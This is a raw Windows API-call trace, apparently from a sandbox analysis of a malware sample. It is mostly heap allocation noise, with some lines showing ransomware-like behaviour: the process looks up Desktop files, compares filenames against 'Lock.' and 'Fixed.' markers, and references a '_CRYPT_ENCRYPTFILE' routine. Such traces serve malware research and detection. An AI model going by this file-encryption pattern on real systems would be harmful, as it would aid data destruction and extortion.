0x2e58910 [0213.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0213.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0213.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0213.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0213.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0213.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0213.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0213.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0213.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0213.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0213.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0213.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0213.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x58) returned 0x2e563a8 [0213.902] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/xwkMqwHw2FNJUh0.ods", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\xwkMqwHw2FNJUh0.ods", lpFilePart=0x8cf650*="xwkMqwHw2FNJUh0.ods") returned 0x2b [0213.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0213.902] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\xwkMqwHw2FNJUh0.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\xwkmqwhw2fnjuh0.ods")) returned 0xffffffff [0213.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0213.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0213.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0213.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0213.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0213.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0213.903] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0213.903] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.903] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0213.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0213.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0213.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0213.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0213.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0213.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0213.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0213.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0213.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0213.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0213.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0213.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0213.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yW8EXq3.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W8EXq3.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8EXq3.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXq3.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xq3.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q3.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0213.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0213.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0213.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0213.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0213.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0213.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0213.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0213.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0213.904] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0213.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0213.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0213.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0213.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0213.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0213.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0213.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0213.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0213.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0213.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0213.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0213.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0213.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0213.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0213.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0213.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0213.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0213.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0213.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0213.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yW8EXq3.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W8EXq3.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8EXq3.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXq3.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xq3.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q3.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0213.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0213.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0213.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0213.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0213.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0213.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0213.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0213.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0213.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0213.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0213.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0213.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0213.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0213.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0213.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0213.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0213.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0213.906] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0213.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0213.906] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0213.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0213.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0213.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0213.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0213.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0213.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0213.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0213.906] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0213.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0213.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0213.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0213.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0213.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0213.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0213.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0213.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0213.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0213.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0213.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0213.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0213.907] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0213.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0213.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0213.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0213.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0213.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0213.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0213.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0213.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0213.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e538c0 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0213.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0213.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0213.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0213.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0213.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0213.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0213.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0213.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0213.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0213.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0213.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0213.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0213.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0213.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0213.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0213.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0213.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0213.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0213.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0213.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0213.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0213.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0213.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0213.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0213.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0213.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0213.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 